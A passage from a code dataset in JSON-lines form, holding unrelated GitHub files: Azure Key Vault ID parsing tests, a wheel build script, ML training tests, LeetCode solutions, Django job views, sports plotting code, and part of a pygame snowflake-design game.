KeyVaultSecretIdentifier(secret.id)\n\n print(parsed_secret_id.name)\n print(parsed_secret_id.vault_url)\n print(parsed_secret_id.version)\n print(parsed_secret_id.source_id)\n # [END parse_key_vault_secret_id]\n assert parsed_secret_id.name == secret_name\n assert parsed_secret_id.vault_url == client.vault_url\n assert parsed_secret_id.version == secret.properties.version\n assert parsed_secret_id.source_id == secret.id\n\n\ndef test_parse_secret_id_with_pending_version():\n source_id = \"https://keyvault-name.vault.azure.net/secrets/secret-name/pending\"\n parsed_secret_id = KeyVaultSecretIdentifier(source_id)\n\n assert parsed_secret_id.name == \"secret-name\"\n assert parsed_secret_id.vault_url == \"https://keyvault-name.vault.azure.net\"\n assert parsed_secret_id.version == \"pending\"\n assert parsed_secret_id.source_id == \"https://keyvault-name.vault.azure.net/secrets/secret-name/pending\"\n\n\ndef test_parse_deleted_secret_id():\n source_id = \"https://keyvault-name.vault.azure.net/deletedsecrets/deleted-secret\"\n parsed_secret_id = KeyVaultSecretIdentifier(source_id)\n\n assert parsed_secret_id.name == \"deleted-secret\"\n assert parsed_secret_id.vault_url == \"https://keyvault-name.vault.azure.net\"\n assert parsed_secret_id.version is None\n assert parsed_secret_id.source_id == \"https://keyvault-name.vault.azure.net/deletedsecrets/deleted-secret\"\n\n\ndef test_parse_secret_id_with_port():\n \"\"\"Regression test for https://github.com/Azure/azure-sdk-for-python/issues/24446\"\"\"\n\n source_id = \"https://localhost:8443/secrets/secret-name/version\"\n parsed_key_id = KeyVaultSecretIdentifier(source_id)\n\n assert parsed_key_id.name == \"secret-name\"\n assert parsed_key_id.vault_url == \"https://localhost:8443\"\n assert parsed_key_id.version == \"version\"\n assert parsed_key_id.source_id == \"https://localhost:8443/secrets/secret-name/version\"\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"sdk/keyvault/azure-keyvault-secrets/tests/test_parse_id.py","file_name":"test_parse_id.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"18542122913","text":"import os\nimport glob\nimport shutil\nimport subprocess\n\nWINDOWS_COMPILER = \"C:\\\\TDM-GCC-64\\\\bin\\\\gcc.exe\"\n\ndef empty_folder(folder):\n\n for filename in os.listdir(folder):\n file_path = os.path.join(folder, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n except Exception as e:\n print('Failed to delete %s. Reason: %s' % (file_path, e))\n\n\ndef get_package_name():\n\n pkgs = glob.glob(\"*.whl\")\n\n if len(pkgs) != 1:\n raise ValueError(\"Multiple packages in dist.\")\n\n return pkgs[0]\n\n\ndef win_compile(directory, mod_name):\n # Cleanup and build for windows\n\n if not os.path.isfile(WINDOWS_COMPILER):\n msg = f\"Windows compiler not found: {WINDOWS_COMPILER}. Please specify a compiler.\"\n raise FileNotFoundError(msg)\n\n os.chdir(directory)\n o_file = os.path.join(directory, mod_name + \".o\")\n dll_file = os.path.join(directory, mod_name + \".dll\")\n\n if os.path.isfile(o_file):\n os.remove(o_file)\n\n if os.path.isfile(dll_file):\n os.remove(dll_file)\n\n obj_cmd = f\"{WINDOWS_COMPILER} -c -o {mod_name}.o {mod_name}.c\"\n dll_cmd = f\"{WINDOWS_COMPILER} -o {mod_name}.dll -s -shared {mod_name}.o -Wl,--subsystem,windows\"\n\n subprocess.call(obj_cmd)\n subprocess.call(dll_cmd)\n\n\ndef rebuild():\n\n base_dir = os.getcwd()\n\n clibs_dir = os.path.join(base_dir, \"npmemory\", \"clibs\")\n\n if not os.path.isdir(\"./build\"):\n os.mkdir(\"./build\")\n \n if not os.path.isdir(\"./dist\"):\n os.mkdir(\"./dist\")\n\n empty_folder(\"./build\")\n empty_folder(\"./dist\")\n\n # Cross-compilation\n\n if os.name == 'posix':\n os.chdir(clibs_dir)\n subprocess.call(\"make\")\n elif os.name == 'nt':\n win_compile(clibs_dir, \"box_average\")\n else:\n raise OSError(f\"OS not supported: {os.name}\")\n\n os.chdir(base_dir)\n\n subprocess.call(\"python setup.py bdist_wheel\", shell=True)\n os.chdir(\"./dist\")\n\n pkg_name = get_package_name()\n print(pkg_name)\n \n subprocess.call(f\"pip uninstall -y {pkg_name}\", shell=True)\n subprocess.call(f\"pip install {pkg_name}\", shell=True)\n\n print(f\"Package installed: {pkg_name}\")\n\n\nrebuild()\n","repo_name":"Fletcher-Climate-Group/npmemory","sub_path":"cross_compile.py","file_name":"cross_compile.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7112611498","text":"import unittest\n\nimport os\nfrom shutil import rmtree\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom inferno.trainers.basic import Trainer\nfrom torch.utils.data.dataset import TensorDataset\nfrom torch.utils.data.dataloader import DataLoader\nfrom inferno.trainers.callbacks.logging.tensorboard import TensorboardLogger\nfrom inferno.extensions.layers.reshape import AsMatrix\n\n\nclass TestTensorboard(unittest.TestCase):\n ROOT_DIR = os.path.dirname(__file__)\n PRECISION = 'float'\n SAVE_DIRECTORY = os.path.join(ROOT_DIR, 'saves')\n LOG_DIRECTORY = os.path.join(ROOT_DIR, 'logs')\n\n @staticmethod\n def _make_test_model(input_channels):\n toy_net = nn.Sequential(nn.Conv2d(input_channels, 8, 3, 1, 1),\n nn.ELU(),\n nn.MaxPool2d(2),\n nn.Conv2d(8, 8, 3, 1, 1),\n nn.ELU(),\n nn.MaxPool2d(2),\n nn.Conv2d(8, 16, 3, 1, 1),\n nn.ELU(),\n nn.AdaptiveMaxPool2d((1, 1)),\n AsMatrix(),\n nn.Linear(16, 10))\n return toy_net\n\n def tearDown(self):\n for d in [self.SAVE_DIRECTORY, self.LOG_DIRECTORY]:\n try:\n rmtree(d)\n except OSError:\n pass\n\n def get_random_dataloaders(self, input_channels=3):\n # Convert build random tensor dataset\n data_shape = (1, input_channels, 64, 64)\n target_shape = (1)\n random_array = torch.from_numpy(np.random.rand(*data_shape)).float()\n target_array = torch.from_numpy(np.random.randint(0, 9, size=target_shape))\n train_dataset = TensorDataset(random_array, target_array)\n test_dataset = TensorDataset(random_array, target_array)\n\n # Build dataloaders from dataset\n train_loader = DataLoader(train_dataset, batch_size=1,\n shuffle=True, num_workers=0, pin_memory=False)\n test_loader = DataLoader(test_dataset, batch_size=1,\n shuffle=True, num_workers=0, pin_memory=False)\n return train_loader, test_loader\n\n def get_trainer(self, input_channels):\n # Build model\n net = self._make_test_model(input_channels)\n # Build trainer\n trainer = Trainer(net)\\\n .build_logger(TensorboardLogger(send_image_at_batch_indices=0,\n send_image_at_channel_indices='all',\n log_images_every=(20, 'iterations')),\n log_directory=self.LOG_DIRECTORY)\\\n .build_criterion('CrossEntropyLoss')\\\n .build_metric('CategoricalError')\\\n .build_optimizer('Adam')\\\n .validate_every((1, 'epochs'))\\\n .save_every((2, 'epochs'), to_directory=self.SAVE_DIRECTORY)\\\n .save_at_best_validation_score()\\\n .set_max_num_epochs(2)\\\n .set_precision(self.PRECISION)\n # Bind loaders\n train_loader, test_loader = self.get_random_dataloaders(input_channels=input_channels)\n trainer.bind_loader('train', train_loader).bind_loader('validate', test_loader)\n return trainer\n\n def test_tensorboard(self):\n trainer = self.get_trainer(3)\n trainer.fit()\n\n def test_tensorboard_grayscale(self):\n trainer = self.get_trainer(1)\n trainer.fit()\n\n def test_serialization(self):\n trainer = self.get_trainer(3)\n # Serialize\n trainer.save()\n # Unserialize\n trainer = Trainer().load(os.path.join(self.ROOT_DIR, 'saves'))\n train_loader, test_loader = self.get_random_dataloaders(input_channels=3)\n trainer.bind_loader('train', train_loader).bind_loader('validate', test_loader)\n trainer.fit()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"inferno-pytorch/inferno","sub_path":"tests/test_training/test_callbacks/test_logging/test_tensorboard.py","file_name":"test_tensorboard.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","stars":245,"dataset":"github-code","pt":"54"} +{"seq_id":"27344015483","text":"from time import time\nfrom typing import List\nfrom heapq import *\n\n\nclass Solution:\n def isPossible(self, target: List[int]) -> bool:\n s = 0\n heap = []\n for t in target:\n heappush(heap, -t)\n s += t\n while s != len(target):\n biggest = -heappop(heap)\n s -= biggest\n if s == 1:\n return True\n if s == 0 or biggest <= s:\n return False\n new = biggest % s\n if new == 0:\n return False\n heappush(heap, -new)\n s += new\n return True\n\n\nstart_time = time()\n\n_target = [9, 3, 5]\n# _target = [1,1,1,2]\n_target = [8,5]\n_target = [1,1000000000]\n# _target = [2,900000001]\n# _target = [2]\n# Input: target = [9,3,5]\n# Output: true\n# Explanation: Start with arr = [1, 1, 1]\n# [1, 1, 1], sum = 3 choose index 1\n# [1, 3, 1], sum = 5 choose index 2\n# [1, 3, 5], sum = 9 choose index 0\n# [9, 3, 5] Done\n\nprint(Solution().isPossible(_target))\n\nprint(\"--- %s seconds ---\" % (time() - start_time))","repo_name":"Sadomtsevvs/Leetcode","sub_path":"1354. Construct Target Array With Multiple Sums.py","file_name":"1354. Construct Target Array With Multiple Sums.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43611610257","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.core.paginator import Paginator\nfrom django.urls import reverse_lazy\nfrom pprint import pprint\nfrom django.views.decorators.csrf import csrf_protect\n\nfrom .models import Application\n\n\n\n\n\nfrom django.views.generic import (\n DetailView,\n ListView,\n UpdateView,\n DeleteView, \n CreateView,\n TemplateView\n)\nfrom .models import Job\nfrom apps.core.models import Commune\n# List Job View\nclass JobListView(ListView):\n\n template_name = 'jobs/job_list.html'\n model = Job\n \n\n\n\ndef job_application(request, job_id):\n print('job application ====================')\n \n if request.user.is_authenticated:\n user = request.user\n job = get_object_or_404(Job, id=job_id)\n Application.objects.create(job=job, applicant=user)\n print(f\"user : {user.email} subscribed to job:{job}\")\n else:\n print('user is not authenticated')\n return redirect(\"jobs:job_list\")\n\n\n \n\n \n# Create Job View\nclass JobCreateView(CreateView):\n template_name = 'jobs/job_create.html'\n model = Job\n fields='__all__'\n \n\n def get_context_data(self, **kwargs):\n context = super(JobCreateView, self).get_context_data(**kwargs)\n context[\"communes\"] = Commune.objects.all()\n \n\n return context\n success_url = reverse_lazy('accounts:signup_success')\n def form_valid(self, form):\n response = super().form_valid(form)\n form.save()\n print(\"hello\", form)\n return response \n \nclass SignupsuccessView(TemplateView):\n template_name = \"jobs/job_create.html\" \n\n\n\n \n\n# Update Job View\nclass JobUpdateView(UpdateView):\n template_name = 'jobs/job_update.html'\n model = Job\n\n\n \n# Detail Job View\nclass JobDetailView(DetailView):\n template_name = 'jobs/job_detail.html'\n model = Job\n pk_url_kwarg = 'id'\n def get(self, request, id):\n job_courant = Job.objects.get(pk=id)\n objets_similaires = Job.objects.filter(budget=job_courant.budget, created=job_courant.created)\n\n context = {\n 'job_courant': job_courant,\n 'objets_similaires': objets_similaires\n }\n\n return render(request, 'jobs/job_detail.html', context)\n\n\n # context_object_name = \"job\"\n\n #def apply_now(self, request, *args, **kwargs):\n #if request.method == 'POST':\n # name = request.POST.get('name')\n #email = request.POST.get('emailaddress')\n # cv_file = request.FILES.get('upload-cv')\n #application = Application(name=name, email=email, cv_file=cv_file)\n # application.save()\n # return redirect('success_page') # Rediriger vers une page de réussite\n #return render(request, 'apply_now.html') # Afficher le formulair\n \n\n\n\n\n\n \n\n# Delete Job View\nclass JobDeleteView(DeleteView):\n template_name = 'jobs/job_delete.html'\n model = Job\n\n\n \n","repo_name":"miyou995/octojobs","sub_path":"apps/jobs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16054658515","text":"import pandas as pd\n# import numpy as np\nfrom pathlib import Path\n# import json\n\nfrom plot_KernHistory_scripts import punt_att, year_boxen, punt_distance_reg,\\\n xPA_reg, binary_reg\n\n # Part 1 - Kern vs NFL 2009-2021, only punts as a Titan\np = Path(Path.cwd(), 'processed data')\n# Gather all punt data 2009-2021\npunts = pd.read_parquet(Path(p,'TN_punts_2009-2021.parquet'))\nothers = pd.read_parquet(Path(p,'notTN_punts_2009-2021.parquet'))\npunts = pd.concat([punts,others])\npunts.reset_index(drop=True, inplace=True)\n\n# ensure datatypes\nfor val in ['yardline_100','punt_blocked','punt_inside_twenty','punt_in_endzone','punt_out_of_bounds',\n 'punt_downed','punt_fair_catch','kick_distance','net_yards','punt_returned']:\n punts.loc[:,val] = punts[val].astype(int)\n\n# mark Kern for plots, lump everyone else together \npunts.loc[punts[punts.punter_player_name != 'B.Kern'].index, 'punter_player_name'] = 'Rest of NFL'\n \n\n# Punt Attempts vs Yds to go (KDE+bars)\npunt_att(punts, (2017,2020)) \n\n# OOB/YTG vs year and Net/YTG vs year, boxen\n# year_boxen(punts,'punt_out_of_bounds',(2014,2022))\nyear_boxen(punts,'net_yards',(2016,2022))\n\n # LM Plots\n# Big Binary Regressions\nsub = punts.loc[:,['yardline_100','season','punter_player_name', \n 'punt_inside_twenty','touchback','punt_out_of_bounds', \n 'punt_downed','punt_fair_catch']]\nbinary_reg(sub)\ndel sub\n\n# Punt Distance Regressions\npunt_distance_reg(punts.loc[:,['yardline_100','season','punter_player_name', \n 'kick_distance','net_yards']])\n\n# EPA/WPA Regressions\nxPA_reg(punts.loc[:,['yardline_100','season','punter_player_name', 'epa','wpa']])\n\n## Return rate vs YTG comes from other plot_Punts\n\n\n","repo_name":"NBPub/TitanUp","sub_path":"code/graphing/plot_KernHistory.py","file_name":"plot_KernHistory.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30316239586","text":"#!/usr/bin/env python3\n''' Test for host and zone properties on XML platform. '''\n\nfrom helper import *\nimport pytest\n\ndef simple_platform_properties(platform, workload, algorithm):\n test_name = f'simple-platform-properties-{algorithm.name}-{platform.name}-{workload.name}'\n output_dir, robin_filename, _ = init_instance(test_name)\n\n if algorithm.sched_implem != 'pybatsim': raise Exception('This test only supports pybatsim for now')\n\n batcmd = gen_batsim_cmd(platform.filename, workload.filename, output_dir, \"\")\n instance = RobinInstance(output_dir=output_dir,\n batcmd=batcmd,\n schedcmd=f\"pybatsim {algorithm.sched_algo_name}\",\n simulation_timeout=30, ready_timeout=5,\n success_timeout=10, failure_timeout=0\n )\n\n instance.to_file(robin_filename)\n ret = run_robin(robin_filename)\n if ret.returncode != 0: raise Exception(f'Bad robin return code ({ret.returncode})')\n\ndef test_simple_platform_properties(properties_platform, mixed_workload, pybatsim_filler_algorithm):\n simple_platform_properties(properties_platform, mixed_workload, pybatsim_filler_algorithm)\n","repo_name":"oar-team/batsim","sub_path":"test/test_platform_properties.py","file_name":"test_platform_properties.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"54"} +{"seq_id":"70926807522","text":"class Solution:\n def combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:\n candidates = sorted(candidates)\n res = []\n \n print(candidates)\n \n # def backtracking(i, part_sum):\n def backtracking(i, part_sum):\n # if partsum == target: append\n if sum(part_sum) == target: \n res.append(part_sum.copy())\n return\n # part_sum > target: return\n if sum(part_sum) > target or i >= len(candidates): return\n \n # case 1. include curr i -> backtracking(i+1, part_sum)\n part_sum.append(candidates[i])\n backtracking(i+1, part_sum)\n \n \n # case 2. X include curr i\n # skip = curr[i]\n # while curr[i] == skip: i+= 1\n skip = part_sum.pop()\n while i < len(candidates) and skip == candidates[i]:\n i += 1\n\n backtracking(i, part_sum)\n \n \n backtracking(0, [])\n return res\nclass Solution:\n def combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:\n candidates = sorted(candidates)\n res = []\n \n def backtrack(part, index):\n part_sum = sum(part)\n if part_sum == target: \n res.append(part.copy())\n return\n if part_sum > target or index >= len(candidates): return\n \n #include candidates[index]\n part.append(candidates[index])\n backtrack(part, index + 1)\n \n # X include candidates[index]\n skip = part.pop()\n while index < len(candidates) and candidates[index] == skip:\n index += 1\n backtrack(part, index)\n \n \n backtrack([],0)\n return res","repo_name":"hogilkim/leetcode","sub_path":"40. Combination Sum II.py","file_name":"40. Combination Sum II.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42749769287","text":"import numpy as np\nfrom bokeh.models import Arrow, VeeHead, Label\n\n\ndef arrows(pos_i=None, pos_f=None, p=None, names=None, color='black'):\n\n if pos_i is None:\n pos_i = np.zeros_like(pos_f)\n \n for i, (x0, y0, xf, yf) in enumerate(np.hstack((pos_i, pos_f))):\n p.add_layout(\n Arrow(end=VeeHead(fill_color=color, line_color=color, size=10),\n x_start=x0, y_start=y0, x_end=xf, y_end=yf)\n )\n\n if names is not None:\n vec_norm = np.sqrt((xf - x0)**2 + (yf - y0)**2)\n \n labels = Label(x=xf, y=yf,\n text=names[i],\n text_color=color,\n x_offset=vec_norm*0.2, y_offset=vec_norm*0.2)\n\n p.add_layout(labels)\n\n return p\n","repo_name":"Puumanamana/ecotools","sub_path":"ecotools/plotting/arrows.py","file_name":"arrows.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24893866705","text":"# dfs, bfs\nimport collections\nimport heapq\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\nn, m, v = map(int, input().split())\n\nll = [[] for _ in range(n+1)]\n\nfor i in range(m) :\n a , b = map(int,input().split())\n ll[a].append(b)\n ll[b].append(a)\n\nfor i in range(n+1) :\n ll[i].sort()\nvisited = [False] * (n+1)\ndef dfs(v) :\n visited[v] = True\n print(v, end = \" \")\n for node in ll[v] :\n if not visited[node] :\n dfs(node)\n\ndef bfs(v) :\n q = deque()\n visited[v] = True\n q.append(v)\n print(v, end = \" \")\n while q :\n nodelist = q.popleft()\n for node in ll[nodelist] :\n if not visited[node] :\n q.append(node)\n visited[node] = True\n print(node, end = \" \")\n\ndfs(v)\nprint()\nvisited = [False] * (n+1)\n\n\nbfs(v)\n","repo_name":"sy8044/snippet","sub_path":"BJ1260.py","file_name":"BJ1260.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71587391201","text":"\"\"\"Mini-batch transformer\"\"\"\n\nfrom torch.utils.data import functional_datapipe\n\nfrom torchdata.datapipes.iter import Mapper\n\nfrom .minibatch import MiniBatch\n\n__all__ = [\n \"MiniBatchTransformer\",\n \"DGLMiniBatchConverter\",\n]\n\n\n@functional_datapipe(\"transform\")\nclass MiniBatchTransformer(Mapper):\n \"\"\"A mini-batch transformer used to manipulate mini-batch\"\"\"\n\n def __init__(\n self,\n datapipe,\n transformer,\n ):\n \"\"\"\n Initlization for a subgraph transformer.\n Parameters\n ----------\n datapipe : DataPipe\n The datapipe.\n transformer:\n The function applied to each minibatch which is responsible for\n transforming the minibatch.\n \"\"\"\n super().__init__(datapipe, self._transformer)\n self.transformer = transformer\n\n def _transformer(self, minibatch):\n minibatch = self.transformer(minibatch)\n assert isinstance(\n minibatch, MiniBatch\n ), \"The transformer output should be an instance of MiniBatch\"\n return minibatch\n\n\n@functional_datapipe(\"to_dgl\")\nclass DGLMiniBatchConverter(Mapper):\n \"\"\"Convert a graphbolt mini-batch to a dgl mini-batch.\"\"\"\n\n def __init__(\n self,\n datapipe,\n ):\n \"\"\"\n Initlization for a subgraph transformer.\n Parameters\n ----------\n datapipe : DataPipe\n The datapipe.\n \"\"\"\n super().__init__(datapipe, MiniBatch.to_dgl)\n","repo_name":"dmlc/dgl","sub_path":"python/dgl/graphbolt/minibatch_transformer.py","file_name":"minibatch_transformer.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":12455,"dataset":"github-code","pt":"54"} +{"seq_id":"8343706144","text":"from __future__ import division\nimport random, math, pygame, json, os.path\nfrom . import pview, flake, background, ptext, render, shape, view, hud, settings, client, sound\nfrom . import frostscene, uploadscene, winscene, scene, progress, stagedata\nfrom .pview import T\n\nclass self:\n\tpass\n\n# Zoomed-in wedge on the left\nFspot0 = (280, 710), 700\n# Full flake view on the right\nFspot1 = (920, 360), 320\n\n# Region of mouse where the player can interact with the wedge.\nFbox0 = pygame.Rect((220, 0, 460, 720))\n\ndef init(stage):\n\tself.stage = stage\n\tself.design = flake.Design.empty()\n\t\n#\tself.points = [(random.uniform(-1, 1), random.uniform(-1, 1)) for _ in range(20)]\n#\tself.points = [p for p in self.points if math.length(p) < 1]\n\t\n#\tself.pshape = shape.Shard((0, 0), \"red\", (0.06, 0.12))\n\n\tself.panchor = None\n\tself.held = None\n\t\n\tself.store = []\n\t\n\tif stage == \"free\":\n\t\tif \"Shard\" in progress.shapes:\n\t\t\tself.store.append([shape.Shard((0, 0.5), \"white\", (0.06, 0.12)), None])\n\t\tif \"Blade\" in progress.shapes:\n\t\t\tself.store.append([shape.Blade((0, 0.5), \"white\", (0.02, 0.06)), None])\n\t\tif \"Ring\" in progress.shapes:\n\t\t\tself.store.append([shape.Ring((0, 0.5), \"white\", 0.03), None])\n\t\tif \"Bar\" in progress.shapes:\n\t\t\tself.store.append([shape.Bar((0, 0.5), \"white\", 0.03), None])\n\t\tif \"Branch\" in progress.shapes:\n\t\t\tself.store.append([shape.Branch((0.2, 0.6), \"white\", (0.03, 0.09)), None])\n\t\tif \"Claw\" in progress.shapes:\n\t\t\tself.store.append([shape.Claw((0, 0.5), \"white\", (0.06, 0.12)), None])\n\t\tif \"Crown\" in progress.shapes:\n\t\t\tself.store.append([shape.Crown((0.2, 0.5), \"white\", 0.04), None])\n\t\tif \"Cusp\" in progress.shapes:\n\t\t\tself.store.append([shape.Cusp((0.2, 0.5), \"white\", 0.04), None])\n\t\tif \"Star\" in progress.shapes:\n\t\t\tself.store.append([shape.Star((0, 0.5), \"white\", 0.12), None])\n\t\tfor shp, n in self.store:\n\t\t\tshp.setksize(2)\n\tif stage in stagedata.store:\n\t\tfor k, color, ksize, v in stagedata.store[stage]:\n\t\t\tif k == \"Shard\":\n\t\t\t\tshp = shape.Shard((0, 0.5), color, (0.06, 0.12))\n\t\t\tif k == \"Blade\":\n\t\t\t\tshp = shape.Blade((0, 0.5), color, (0.06, 0.12))\n\t\t\tif k == \"Ring\":\n\t\t\t\tshp = shape.Ring((0, 0.5), color, 0.03)\n\t\t\tif k == \"Bar\":\n\t\t\t\tshp = shape.Bar((0, 0.5), color, 0.03)\n\t\t\tif k == \"Branch\":\n\t\t\t\tshp = shape.Branch((0.2, 0.6), color, (0.06, 0.12))\n\t\t\tif k == \"Claw\":\n\t\t\t\tshp = shape.Claw((0, 0.5), color, (0.06, 0.12))\n\t\t\tif k == \"Cusp\":\n\t\t\t\tshp = shape.Cusp((0, 0.5), color, 0.04)\n\t\t\tif k == \"Star\":\n\t\t\t\tshp = shape.Star((0, 0.5), color, 0.12)\n\t\t\tshp.setksize(ksize)\n\t\t\tself.store.append([shp, v])\n\tself.maxshapes = progress.maxshapes if stage == \"free\" else None\n\n\tself.buttons = [\n\t\thud.Button(((1200, 640), 50), \"Quit\"),\n\t]\n\n\tself.labels = []\n\tif self.stage == \"free\":\n\t\tif not settings.offline:\n\t\t\tself.buttons.append(hud.Button(((640, 640), 50), \"Share\"))\n\t\tif len(progress.colors) > 1:\n\t\t\tfor jcolor, color in enumerate(progress.colors):\n\t\t\t\tFspot = (180 + 23 * (jcolor % 2), 36 * jcolor + 60), 20\n\t\t\t\ttext = \"???\" if color == \"?\" else \"color-%s\" % color\n\t\t\t\tdrawtext = color == \"?\"\n\t\t\t\tbcolor = color if color != \"?\" else \"#cccccc\"\n\t\t\t\tself.buttons.append(hud.Button(Fspot, text, drawtext = drawtext, color = bcolor))\n\t\t\tself.labels.append((\"Color\", (180 + 23/2, 20)))\n\t\tif len(progress.sizes) > 1:\n\t\t\ty = 500\n\t\t\tfor jsize, size in enumerate(progress.sizes):\n\t\t\t\tFspot = (180 + 23 * (jsize % 2), y), 10 + 5 * size\n\t\t\t\ty += 25 + 10 * size\n\t\t\t\tself.buttons.append(hud.Button(Fspot, \"size-%s\" % size, drawtext = False))\n\t\t\tself.labels.append((\"Size\", (180 + 23/2, 460)))\n\n\tsetpoints()\n\tself.todo = True\n\tself.done = False\n\tself.pushed = False\n\tself.tdone = 0\n\n\n\tfor j, (shp, count) in enumerate(self.store):\n\t\tFspot = (50 + 48 * (j % 2), 60 + 82 * j), 44\n\t\tself.buttons.append(hud.Button(Fspot, \"store-%d\" % j, drawtext = False, color = \"#999999\", shape = shp))\n\t\n\tself.ydata, self.ndata = [], []\n\n\tif \"stage\" in self.stage:\n\t\tsound.playmusic(\"twisting\")\n\telif self.stage == \"free\":\n\t\tsound.playmusic(\"techlive\")\n\telse:\n\t\tsound.playmusic(\"undaunted\")\n\ndef setpoints():\n\tself.yespoints = []\n\tself.nopoints = []\n\tif self.stage in stagedata.points:\n\t\tyes, no = stagedata.points[self.stage]\n\t\tfor a, r, n in yes:\n\t\t\tif settings.collapsepoints:\n\t\t\t\tn = 0\n\t\t\tif n % 2 == 1:\n\t\t\t\ta = 1 - a\n\t\t\tC, S = math.CS((n + a) / 12 * math.tau, r)\n\t\t\tself.yespoints.append((S, C))\n\t\tfor a, r, n in no:\n\t\t\tif settings.collapsepoints:\n\t\t\t\tn = 0\n\t\t\tif n % 2 == 1:\n\t\t\t\ta = 1 - a\n\t\t\tC, S = math.CS((n + a) / 12 * math.tau, r)\n\t\t\tself.nopoints.append((S, C))\n\tcheckcover()\n\ndef toggleeasy():\n\tsettings.closepoints = not settings.closepoints\n\tsettings.collapsepoints = settings.closepoints\n\tsetpoints()\n\ndef think(dt, controls):\n\t\n#\tself.inFbox0 = Fbox0.collidepoint(controls.mpos)\n\tself.mpos = controls.mpos\n\tself.ppos = view.FconvertB(Fspot0, controls.mpos)\n\tx, y = self.ppos\n\tself.inFbox0 = -0.06 < x < y / math.sqrt(3) + 0.06\n#\tif controls.mdown:\n#\t\tself.design.addcircle((x, y), 0.2, random.choice([\"red\", \"orange\", \"yellow\", \"white\", \"green\"]))\n#\t\tcolors = [\"#ffffff\", \"#ddddff\", \"#ddeeff\"]\n#\t\tself.design.addshard(self.ppos, (0.06, 0.12), random.choice(colors))\n#\t\tself.design.addshape(\"blade\", self.ppos, random.choice(colors), width = 0.01)\n\tbackground.update(dt, (20, 20, 60))\n#\tself.pointcolor = self.design.colorat(view.FconvertB(Fspot1, controls.mpos))\n\tself.pointcolor = None\n#\tself.pshape.anchors[0] = self.pshape.constrain(self.ppos, 0)\n\n\tself.panchor = None\n\tif self.held is None and self.inFbox0:\n\t\tpanchors = [(math.distance(self.ppos, anchor), i, j) for i, j, anchor in self.design.anchors()]\n\t\tif panchors:\n\t\t\td, i, j = min(panchors)\n\t\t\tif d < 0.03:\n\t\t\t\tself.panchor = i, j\n\n\tif self.panchor and controls.mdown:\n\t\ti, self.jheld = self.panchor\n\t\tself.held = self.design.shapes.pop(i)\n\t\tself.cursorimg = self.held.tobasic().cursorimg(T(100))\n\t\tself.design.undraw()\n\n\tif self.held:\n\t\tself.held.constrainanchor(self.jheld, self.ppos)\n\t\tif controls.mup:\n\t\t\tif self.inFbox0:\n\t\t\t\tself.design.shapes.append(self.held)\n\t\t\t\tself.design.undraw()\n\t\t\t\tsound.play(\"bonk\")\n\t\t\telif self.stage != \"free\":\n\t\t\t\tjstore = getjstore(self.held)\n\t\t\t\tstore = self.store[jstore]\n\t\t\t\tif store[1] is not None:\n\t\t\t\t\tstore[1] += 1\n\t\t\tself.held = None\n\t\tcheckcover()\n\n\tself.jbutton = None\n\tif not self.held and not self.inFbox0:\n\t\tfor jbutton, button in enumerate(self.buttons):\n\t\t\tif button.contains(controls.mpos):\n\t\t\t\tself.jbutton = jbutton\n\n\tif self.jbutton is not None and controls.mdown:\n\t\tonclick(self.buttons[self.jbutton])\n\n\tif pygame.K_TAB in controls.kdowns:\n\t\ttoggleeasy()\n\tif settings.DEBUG:\n\t\tif pygame.K_F1 in controls.kdowns:\n\t\t\tself.done = True\n\t\tif pygame.K_F2 in controls.kdowns:\n\t\t\taddpoint(controls.mpos)\n\t\tif pygame.K_F5 in controls.kdowns:\n\t\t\tsave()\n\t\tif pygame.K_F7 in controls.kdowns:\n\t\t\trandompoints()\n\t\n\tif not self.done and self.todo and not self.held:\n\t\tcheckdone()\n\tif self.done and not self.pushed:\n\t\tself.tdone = math.approach(self.tdone, 1, dt)\n\t\tif self.tdone == 1:\n\t\t\tprogress.beat(self.stage)\n\t\t\tself.pushed = True\n\t\t\tscene.pop()\n\t\t\tscene.push(winscene, self.design, Fspot1, self.stage)\n\ndef addpoint(pos):\n\tx, y = view.FconvertB(Fspot1, pos)\n\tr = math.length((x, y))\n\tna = 12 / math.tau * math.atan2(x, y)\n\tn, a = divmod(na, 1)\n\tn = int(n)\n\tif n % 2 == 1:\n\t\ta = 1 - a\n\ta = round(a, 3)\n\tr = round(r, 3)\n\tdata = a, r, n\n\n\tif n % 2 == 1:\n\t\ta = 1 - a\n\tC, S = math.CS((n + a) / 12 * math.tau, r)\n\tpF = S, C\n\tcovered = iscovered(pF)\n\tif covered:\n\t\tself.ydata += [data]\n\t\tself.yespoints += [pF]\n\telse:\n\t\tself.ndata += 